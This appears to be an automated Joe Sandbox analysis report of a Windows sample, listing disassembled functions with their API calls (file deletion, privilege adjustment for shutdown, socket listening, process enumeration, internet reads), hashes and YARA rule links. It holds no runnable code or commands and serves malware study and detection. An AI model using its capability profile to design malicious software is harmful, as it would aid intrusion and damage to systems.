                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: fef8bbd68c0c1ee7b31305804e58d4afbd266884ff4249812177fa34bf562a05
                                                • Instruction ID: 64d1eb1657a06974a441d2f2bcdd33f9f6f381684e34b3aac562bc9d1eab8dee
                                                • Opcode Fuzzy Hash: fef8bbd68c0c1ee7b31305804e58d4afbd266884ff4249812177fa34bf562a05
                                                • Instruction Fuzzy Hash: 28128BB0A00609DFDF14DFA5D985AAEB7F5FF48300F10856DE406A7251EB39AE11CB91
                                                Function 00785680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                • _memmove.LIBCMT ref: 007C05AE
                                                • _memmove.LIBCMT ref: 007C06C3
                                                • _memmove.LIBCMT ref: 007C076A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                • String ID: yZx
                                                • API String ID: 1300846289-3136013853
                                                • Opcode ID: 0b779189c33bb7e2feed41ff388d41f09b811c79963309091041ea0d4b6a1df3
                                                • Instruction ID: 727876a37448c47032990de1c28fcc9ad07a5a819267d1858c86d00558d34600
                                                • Opcode Fuzzy Hash: 0b779189c33bb7e2feed41ff388d41f09b811c79963309091041ea0d4b6a1df3
                                                • Instruction Fuzzy Hash: 4D02ADB0A00209DFCF14DF64D985AAEBBB5EF44310F14806DE80AEB255EB399A51CB91
                                                Function 007D3B56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                  • Part of subcall function 007D4AD8: GetFileAttributesW.KERNEL32(?,007D374F), ref: 007D4AD9
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D3BCD
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 007D3C1D
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D3C2E
                                                • FindClose.KERNEL32(00000000), ref: 007D3C45
                                                • FindClose.KERNEL32(00000000), ref: 007D3C4E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                • Opcode ID: 5ef2532e9aa0499f67c84b7d770bbb10dd58ce64225c9bca36640b36780bbe09
                                                • Instruction ID: 70115a708401b67499bc28a086bd7a7d0910519f4820208dab89bab126cc845c
                                                • Opcode Fuzzy Hash: 5ef2532e9aa0499f67c84b7d770bbb10dd58ce64225c9bca36640b36780bbe09
                                                • Instruction Fuzzy Hash: 2F31A431009345DBC705EB24CC998AFB7E8BE95344F448E2EF4D992191EF289A0DC767
                                                Function 007D5264 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007C8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C8AED
                                                  • Part of subcall function 007C8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8B1A
                                                  • Part of subcall function 007C8AA3: GetLastError.KERNEL32 ref: 007C8B27
                                                • ExitWindowsEx.USER32(?,00000000), ref: 007D52A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                • Opcode ID: fcb76623ad7a2aa0d959e4e4cc2c4c1617ff711ad50ddceedfe141c25a95884c
                                                • Instruction ID: d8d181dd3f6a493b2041e0879a273c104c129887d80349dd68868db69ca700d3
                                                • Opcode Fuzzy Hash: fcb76623ad7a2aa0d959e4e4cc2c4c1617ff711ad50ddceedfe141c25a95884c
                                                • Instruction Fuzzy Hash: 6A01F7B1691611ABF7282678AC4BFBA7378FB05751F244127F807D26D2DD6C7C0885D4
                                                Function 00783190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __itow__swprintf
                                                • String ID: Oax
                                                • API String ID: 674341424-2797580295
                                                • Opcode ID: 70d2a1c7b2d0870b7c81826aae61aea1f1ae4c730b08ac42c24887161657df85
                                                • Instruction ID: 4e3e0d9bf7b3778384047670c8bb9c6f22794c06ec1757955ed722a6092c662e
                                                • Opcode Fuzzy Hash: 70d2a1c7b2d0870b7c81826aae61aea1f1ae4c730b08ac42c24887161657df85
                                                • Instruction Fuzzy Hash: 33227D71508301DFD724EF28C895BAAB7E4BF84710F10891DF59A97291EB78EA04CB92
                                                Function 007E6399 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E63F2
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6401
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E641D
                                                • listen.WSOCK32(00000000,00000005), ref: 007E642C
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6446
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E645A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                • Opcode ID: 3d9c32c3dbe5c65239aa4b07953bbb19179273adbd81610807e175ab78201eaf
                                                • Instruction ID: 7e3522d4cb348c77878b37fdb10818be3c42e98e51437fbe41182d10387fd01b
                                                • Opcode Fuzzy Hash: 3d9c32c3dbe5c65239aa4b07953bbb19179273adbd81610807e175ab78201eaf
                                                • Instruction Fuzzy Hash: F2218D34601204DFCB10AF64C989A7EB7E9EF49760F14C169EA5AA72D1CB78AD01CB61
                                                Function 00771287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 007719FA
                                                • GetSysColor.USER32(0000000F), ref: 00771A4E
                                                • SetBkColor.GDI32(?,00000000), ref: 00771A61
                                                  • Part of subcall function 00771290: DefDlgProcW.USER32(?,00000020,?), ref: 007712D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ColorProc$LongWindow
                                                • String ID:
                                                • API String ID: 3744519093-0
                                                • Opcode ID: 78fd0eea51d2d164d363cf402337e4eee83e933df171f959565b3bc49645e1b2
                                                • Instruction ID: d007e596af55e0b0d578ff54216176268ae3b57fbe61d6b6d54d118e1ef6f47d
                                                • Opcode Fuzzy Hash: 78fd0eea51d2d164d363cf402337e4eee83e933df171f959565b3bc49645e1b2
                                                • Instruction Fuzzy Hash: 3AA15AB1106588FADE38AB3C8C48D7F369DEB823C1B95C619F50AD6192DA2CDD01D3B5
                                                Function 007DBD48 Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DBD72
                                                • _wcscmp.LIBCMT ref: 007DBDA2
                                                • _wcscmp.LIBCMT ref: 007DBDB7
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DBDC8
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007DBDF8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                • String ID:
                                                • API String ID: 2387731787-0
                                                • Opcode ID: ba01fd6ebaa28d5f9d9f1fe36e6984475c134863d3068f867ab45ca94fa24d8c
                                                • Instruction ID: 4f59cf54fffb90564089a84fad172d47dffc69c4530409b71768d72792148b29
                                                • Opcode Fuzzy Hash: ba01fd6ebaa28d5f9d9f1fe36e6984475c134863d3068f867ab45ca94fa24d8c
                                                • Instruction Fuzzy Hash: 32518C35604602DFCB18DF28D494EAAB3F4EF48720F11851EEA5A873A1DB38ED05CB91
                                                Function 007E685D Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007E7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E7ECB
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E68B4
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E68DD
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E6916
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6923
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E6937
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 99427753-0
                                                • Opcode ID: 8ca5ec8e9c32d2eaab976d75a25837179adf3e324c340b2e653f5470b8a0fec9
                                                • Instruction ID: a189e87f8c2dd5e98b0495b2b28408be1f3ea3729352ca9e0100a0ff52b0f055
                                                • Opcode Fuzzy Hash: 8ca5ec8e9c32d2eaab976d75a25837179adf3e324c340b2e653f5470b8a0fec9
                                                • Instruction Fuzzy Hash: 69419375641210DFEF10AB64988AF7A77A99F48760F44C05CFA19AB2D2DA789D008B91
                                                Function 007F53DF Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 8df6204776265c515eed5304fc1ef0799a7280bba51564dddd0aba9dcdb4ba05
                                                • Instruction ID: be4801418ff2c8076f8d3f35e2afe736209badacf6822bf12f93cbde1c6ed3a8
                                                • Opcode Fuzzy Hash: 8df6204776265c515eed5304fc1ef0799a7280bba51564dddd0aba9dcdb4ba05
                                                • Instruction Fuzzy Hash: 2311E231700954ABEB206F26DC48B7AB798FF44762B048028FB46D7351CB3CA842CAA4
                                                Function 007DC423 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007DC4BE
                                                • CoCreateInstance.OLE32(00802D6C,00000000,00000001,00802BDC,?), ref: 007DC4D6
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • CoUninitialize.OLE32 ref: 007DC743
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                • String ID: .lnk
                                                • API String ID: 2683427295-24824748
                                                • Opcode ID: 17ce002a14a68c26b41ec9a86cd8c5b132c7584e33879da7767a72202e6657ba
                                                • Instruction ID: 32ce1d47163e1bfecda89050a9ca8334dee1aeb42eabc9713b38d4a00a0e69bb
                                                • Opcode Fuzzy Hash: 17ce002a14a68c26b41ec9a86cd8c5b132c7584e33879da7767a72202e6657ba
                                                • Instruction Fuzzy Hash: EAA13B71108205EFD700EF54C895EABB7F8FF85354F00892DF25A972A2DB74AA09CB52
                                                Function 007EC104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,007B1CB7,?), ref: 007EC112
                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC124
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                • API String ID: 2574300362-1816364905
                                                • Opcode ID: d4740f3e96255b7124a2376f8f713f41787be69d4f8656df1323b0b9a347e29d
                                                • Instruction ID: 95a9d0b60f3d77a98223999988063fe67faeeada352b1a423edc68f0cb306134
                                                • Opcode Fuzzy Hash: d4740f3e96255b7124a2376f8f713f41787be69d4f8656df1323b0b9a347e29d
                                                • Instruction Fuzzy Hash: 25E0ECB860172BCFD7215B2AD858A9276E4EF0D759B408439E899D2351EB7CD881C750
                                                Function 007EEF21 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007EEF51
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007EEF5F
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007EF01F
                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007EF02E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                • String ID:
                                                • API String ID: 2576544623-0
                                                • Opcode ID: cdc75fc50699c3c813e4e0bbf7af310c0ad0dab1a9fee5891d0e244813bf50a7
                                                • Instruction ID: 291e51e839bf78f2ade1edaf7ee35c9c44359061376f0071d8fe9213b23549f0
                                                • Opcode Fuzzy Hash: cdc75fc50699c3c813e4e0bbf7af310c0ad0dab1a9fee5891d0e244813bf50a7
                                                • Instruction Fuzzy Hash: 24517D71505301DBD710EF24DC89E6BBBE8FF88750F10892DF59997291EB74A904CB92
                                                Function 007CE928 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007CE93A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: ($|
                                                • API String ID: 1659193697-1631851259
                                                • Opcode ID: f0584945e44f730dc395915fe11a28d1be1f8e3c191e0b6864bf09b4c5e3ccf8
                                                • Instruction ID: 9b9ef2ab2035e7dd1aa718f6f13ce427439086c924bbfcbdd7e6b575eb4bdfb1
                                                • Opcode Fuzzy Hash: f0584945e44f730dc395915fe11a28d1be1f8e3c191e0b6864bf09b4c5e3ccf8
                                                • Instruction Fuzzy Hash: 3E321475A00605DFDB28CF19C481E6AB7F1FF48320B15C56EE99ADB3A1E774A981CB40
                                                Function 007E2404 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007E1920,00000000), ref: 007E24F7
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007E252E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
                                                • Opcode ID: cb7fe01ddd4bc0de1c3a48e045346c407ac32687083c4a3c493e58b177bbbb83
                                                • Instruction ID: 6c44181b4e1c6e74bd5a237f973ed5d47036fe1a2332d95ffd846596fb4f7747
                                                • Opcode Fuzzy Hash: cb7fe01ddd4bc0de1c3a48e045346c407ac32687083c4a3c493e58b177bbbb83
                                                • Instruction Fuzzy Hash: CD411D71501349FFEB20DE96DC85EBBB7BCEB48314F10406AF60197182EB789E529750
                                                Function 007DB3BF Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB3CF
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007DB429
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007DB476
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1682464887-0
                                                • Opcode ID: 5170897d83d09b5c7d3896f22f280d4897359a3a08a8ca3e2bb86ed70d408f27
                                                • Instruction ID: 95b87c7af0643f43560cf5ae4aa3cb6fc915a274c8b68623428b8ca6d445b695
                                                • Opcode Fuzzy Hash: 5170897d83d09b5c7d3896f22f280d4897359a3a08a8ca3e2bb86ed70d408f27
                                                • Instruction Fuzzy Hash: 35216035A01118EFCB00EFA5D884EEDBBB8FF48310F1580AAE905AB351CB359915CB51
                                                Function 007C8AA3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C8AED
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8B1A
                                                • GetLastError.KERNEL32 ref: 007C8B27
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
